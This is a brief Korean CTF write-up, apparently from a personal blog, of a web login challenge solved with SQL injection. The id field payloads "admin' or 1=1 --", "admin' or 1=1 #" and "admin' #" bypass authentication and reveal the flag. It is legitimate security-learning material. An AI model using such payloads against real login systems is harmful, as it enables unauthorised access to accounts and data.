반응형
기본 화면에서 id pw 묻는 문제
id와 pw 아무거나 넣을 시
id를 admin으로 넣어보자
역시 같은 정보가 뜨고 있다.
sql 인젝션을 수행해보자
id : admin' or 1=1 --
pw : test
1에서 2로 바뀌었다.
mysql일 수 있으니 주석 처리하는것을 바꿔보자
id : admin' or 1=1 #
pw : test
관리자만 접근 가능하다고 한다.
인젝션은 되는것 같은데 무언가 부족하다.
id : admin' #
pw :
flag 완료
반응형
'IT > CTF' 카테고리의 다른 글
| CCE2023 APOLLO WEB HACKING [100] - reborn of php (0) | 2023.06.03 |
|---|---|
| CCE2023 APOLLO WEB HACKING [100] - BabyWeb (0) | 2023.06.03 |
| [RootMe] HTTP - Open redirect [WEB/Server] (0) | 2022.07.06 |
| [RootMe] HTTP - IP restriction bypass [WEB/Server] (0) | 2022.07.02 |
| [RootMe] HTML - Source code [WEB/Server] (0) | 2022.07.02 |
